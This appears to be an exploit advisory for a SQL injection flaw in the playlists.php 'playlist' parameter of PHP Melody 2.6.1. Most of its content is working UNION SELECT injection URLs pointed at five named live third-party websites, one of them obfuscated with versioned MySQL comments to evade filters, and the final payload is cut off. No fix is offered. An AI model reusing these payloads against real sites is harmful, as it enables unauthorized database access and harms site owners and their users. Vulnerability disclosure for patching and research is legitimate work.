PHP Melody version 2.6.1 suffers from a remote SQL injection vulnerability.
d1030b2d22474e4e4a43dd856b933af5---------------------------------------------------
PHP Melody 2.6.1 SQL Injection
---------------------------------------------------
###################################################
[+] Author : Venkat Rajgor
[+] Email : [email protected]
[+] Vulnerability : SQL injection
###################################################
---------info Cms----------------
name : PHP Melody version 2.6.1
email : [email protected]
dowloand : http://www.phpsugar.com
web : http://www.phpsugar.com
price : $39 USD
Vulnerable parameter: playlists.php?playlist='
Demo Sites:
[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'
/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64
69763e,version(),0x3c212d2d),null,null,null,null,null,